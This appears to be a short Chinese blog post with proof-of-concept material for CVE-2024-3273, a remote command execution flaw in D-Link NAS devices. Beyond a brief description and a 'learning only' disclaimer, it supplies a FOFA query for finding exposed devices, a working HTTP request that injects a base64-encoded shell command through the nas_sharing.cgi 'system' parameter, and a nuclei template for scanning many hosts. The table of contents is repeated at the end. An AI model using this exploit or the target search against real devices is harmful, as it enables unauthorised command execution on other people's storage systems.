免责声明：
漏洞描述
fofa语句
漏洞复现
打开页面
构造payload
nuclei批量验证
pocsuite3 验证（github获取）
verify 验证
attack 验证
github poc总汇地址： https://github.com/AYcg/poc

免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞

fofa语句

body="Text:In order to access the ShareCenter"

漏洞复现

打开页面

构造payload

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close

nuclei批量验证

id: D-Link-rce-CVE-2024-3273

info:
  name: D-Link-rce-CVE-2024-3273
  author: changge
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw: 
    - |
      GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: */*
      Connection: Keep-Alive

    matchers:
      - type: dsl
        dsl: 
         - 'contains(body,"uid")'

pocsuite3 验证（github获取）

verify 验证

attack 验证

github poc总汇地址：https://github.com/AYcg/poc

D-Link产品远程命令执行漏洞(CVE-2024-3273)

免责声明：

漏洞描述

fofa语句

漏洞复现

打开页面

构造payload

nuclei批量验证

pocsuite3 验证（github获取）

verify 验证

attack 验证

github poc总汇地址：https://github.com/AYcg/poc